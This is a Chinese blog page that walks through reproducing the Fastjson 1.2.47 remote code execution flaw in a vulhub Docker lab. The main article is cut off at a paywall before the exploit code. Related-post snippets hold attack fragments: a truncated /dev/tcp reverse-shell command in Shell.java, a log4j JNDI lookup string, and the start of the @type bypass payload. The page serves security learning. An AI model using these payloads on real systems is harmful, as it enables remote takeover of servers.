fastjson1.2.47RCE漏洞的复现

最新推荐文章于 2025-11-08 14:31:23 发布
原创 最新推荐文章于 2025-11-08 14:31:23 发布 · 2.1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#docker #linux #java

本文详细描述了一位开发者如何在vulhub Docker环境中复现Fastjson 1.2.47版本的远程代码执行(RCE)漏洞,包括环境搭建、漏洞利用步骤、关键代码分析和总结反思。

Fastjson1.2.47RCE漏洞复现

前言

我在上一篇文章中提到了我在长安杯打比赛,有一道我怎么也看不懂的题目,也就是当时“soeasy”。当我我查阅资料以及看了其他师傅们的wp之后,我发现这是Fastjson的一个RCE漏洞。因为以前接触Java的时间比较短,还不够熟悉,所以就去搞了个环境复现这个Fastjson的RCE漏洞。也就有了这篇文章。

环境准备

为了方便起见,我这次直接选择了vulhub的docker环境,有两种方式可以去获得项目源码
一种是直接在github上down下来
https://github.com/vulhub/vulhub
还有一种是去Gitee上下载,两种并没有什么区别,Gitee是国内的,可能速度快一点?
https://gitee.com/puier/vulhub/
(当然这一步在linux系统中只需要git clone)

复现正文

靶机用的是kali,攻击者用的是windows10

1.启动docker环境,进行环境搭建

我们找到vulhub-master文件夹,在里面启动终端。然后输入cd fastjson/1.2.47-rce/
在这里插入图片描述
进入到目录后,我们输入docker-compose up -d启动docker环境。
在这里插入图片描述
这时候我们看一下本地的8090端口,是否已经启动服务
在这里插入图片描述
我们将网络设置为桥接模式,将虚拟机的网卡桥接到我们的物理网卡上。
在这里插入图片描述
看一下靶机的IP地址
在这里插入图片描述
我们从客户机进行访问,发现能够访问。那么,环境搭建完成。
在这里插入图片描述

2.漏洞利用前的准备

我们要事先准备两个文件分别是Exploit.java以及marshalsec-0.0.3-SNAPSHOT-all.jar
其中Exploit.java的内容如下:
这个EXP的创意源自这位大

最低0.47元/天 解锁文章
漏洞库】Fastjson_1.2.47_rce
yuan_boss的博客
09-08 1444
我们可以看到connect方法中具有JNDI的lookup方法,lookup是JNDI用于查找资源的方法,里面传的参数是dataSourceName,所以我们可以在payload的json字符串中传入这个参数dataSourceName,并且指定他的 值为我们的RMI服务或者其他服务,lookup就会到我们指定的服务中下载恶意代码并执行。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
技术分享 | Fastjson-RCE漏洞复现
Jeeseen123的博客
05-26 598
Fastjson提供autotype功能,允许用户在反序列化数据中通过 @type 指定反序列化的类型,其次Fastjson自定义的反序列化会调用指定类中的setter方法和部分getter方法。 当组件开启autotype并且反序列化不可信的数据时,攻击者构造的数据(恶意代码)会进入特定类的setter或getter方法中,可能会被恶意利用。 影响版本 Fastjson1.2.47以及之前的版本 复现 1.1 环境准备 攻击机1 用于接受反弹shell 系统:Win10 x64 安装nc,burpsuit
log4j2 RCE漏洞(CVE‑2021‑44228)原理及复现(详细流程)
最新发布
2401_87678299的博客
11-08 1221
摘要:2021年末曝光的Log4j2漏洞(CVE-2021-44228)是近年来最具破坏力的安全漏洞之一。该漏洞源于Log4j2的JNDI查找功能,攻击者通过构造特殊日志消息(如${jndi:ldap://恶意地址})可实现远程代码执行。受影响版本包括2.0-beta9至2.14.1漏洞利用过程包括:1)通过DNSLOG检测漏洞2)利用JNDI注入工具建立RMI/LDAP服务;3)触发远程类加载实现反弹shell。修复方案包括升级至2.15.0+、禁用JNDI功能或移除相关类文件。该漏洞影响范围广,需加
漏洞复现Fastjson_1.2.47_rce
过期的秋刀鱼
11-04 1191
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。后可向其POST新的JSON对象,后端会利用fastjson进行解析。发送POC到FastJson服务器,通过RMI协议远程加载恶意类。构造反弹shell,进行base64编码。将content-type修改为。即可看到一个json对象被返回。
fastjson<1.2.47 RCE 漏洞复现
ai74583的博客
07-15 883
这两天爆出了 fastjson 的老洞,复现简单记录一下。 首先使用 spark 搭建一个简易的利用 fastjson 解析 json 的 http server。 package cn.hacktech.fastjsonserver; import com.alibaba.fastjson.JSON; import static spark.Spark.*; public cla...
fastjson 1.2.47 RCE漏洞保姆级复现
ALLEN'Blog
02-01 1504
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
Fastjson 1.2.47 RCE漏洞复现
wutiangui的博客
11-07 652
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。修改用户信息发现有回显。2.开启http服务。
fastjson_1.2.47rce漏洞复现
weixin_71090536的博客
01-23 2686
Fastjson是一个 Java 语言编写的高性能 JSON 解析器和生成器
fastjson 1.2.47漏洞复现
SUPER131110的博客
10-17 198
fastjsonscan找到poc。在tmp目录下写入lc文件。
渗透测试-Fastjson 1.2.47 RCE漏洞复现
道阻且长,行则将至
07-11 8354
漏洞概述 Fastjson是阿里巴巴公司开源的一款 json 解析器,其性能优越,被广泛应用于各大厂商的Java项目中。Fastjson 近几年被爆出的反序列化 RCE 漏洞影响无数厂商,2017年官方主动爆出了 fastjson 1.2.24 的反序列化漏洞以及升级公告,fastjson1.2.24 版本后增加了反序列化白名单。 而在2019年6月,fastjson 又被爆出在 fastjson< =1.2.47 的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意
fastjson反序列化漏洞(1.2.47-rce)
SuperherRo的博客
10-18 966
FastJson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。 通俗理解就是:漏洞利用fastjson autotype在处理json对象的时候,未对@type字段进行完全的安全性验证,攻击者可以传入危险类,并调用危险类连接远程rmi主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞的利用,获取服务器的敏感信息泄露,甚至可以利用此漏洞进一步对服务器数据进行修改,增
FastjsonRCE1.2.47漏洞复现
02-24 3219
Fastjson漏洞原理和RCE1.2.47漏洞复现
fastjson1.2.47RCE远程命令执行漏洞复现
zyl404的博客
01-06 1993
fastjson1.2.47RCE远程命令执行漏洞分析 漏洞背景 在2019年6月,fastjson 被爆出在 fastjson< =1.2.47 的版本中,攻击者可以利用特殊构造的 json 字符串绕过白名单检测,成功执行任意命令。 漏洞分析 此漏洞利用的核心点是java.lang.class这个java的基础类,在fastjson 1.2.48以前的版本没有做该类做任何限制,加上代码的一些逻辑缺陷,造成黑名单以及autotype的绕过。 过程: 1.Fastjson在开始解析json (JS 对象
fastjson1.2.47以下 RCE 漏洞复现
问题很多的小明
09-21 1402
author:test Ox01 具体环境 War包部署在tomcat,war包使用fastjson解析 tomcat版本 java版本 0x02 尝试是否可以接受请求(也可以没有这一步) 先尝试是否可以收到ldap请求 post数据包如下: POST /fastjson/ HTTP/1.1 Host: x.x.x.x:8080 Cache-Control: max-age=0 Upgrade...
fastjson 1.2.24 反序列化 RCE 漏洞复现
m0_63299551的博客
06-27 806
具体可以参考这篇文章FastJson的介绍与使用(一)_maven fastjson-优快云博客fastjson最主要的功能就是可以将Java对象和json之间来回转化,而这个漏洞出现的原因就是在反序列化的过程中。
Fastjson1.2.24RCE漏洞复现
L1928的博客
05-18 1490
1.启动环境并且访问 2.下载marshalsec-0.0.3-SNAPSHOT-all.jar 3.新建Shell.java文件 import java.lang.Runtime; import java.lang.Process; public class shell{ static { try { Runtime rt = Runtime.getRuntime(); String[] commands = {“/bin/bash”,“-c”,“exec 5<>/dev/tcp/192.
fastjsonRCE漏洞复现记录
beijiao3982的博客
07-31 1020
参考链接: https://paper.seebug.org/994/https://www.cnblogs.com/jinqi520/p/11097779.htmlhttps://xz.aliyun.com/t/5680 0x01 漏洞复现 RMi 1. payload: {"@type":"java.lang.Class",br/>"a":{"@type":"java.lang.Cla...
fastjson(反序列化)漏洞复现
weixin_58954236的博客
09-11 1662
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。​ 关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化为Java对象时由于没有进行合理检查而导致的。
fastjson1.2.47漏洞复现
07-27
- *2* [fastjson1.2.47漏洞复现](https://blog.csdn.net/m0_63699746/article/details/131551535)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值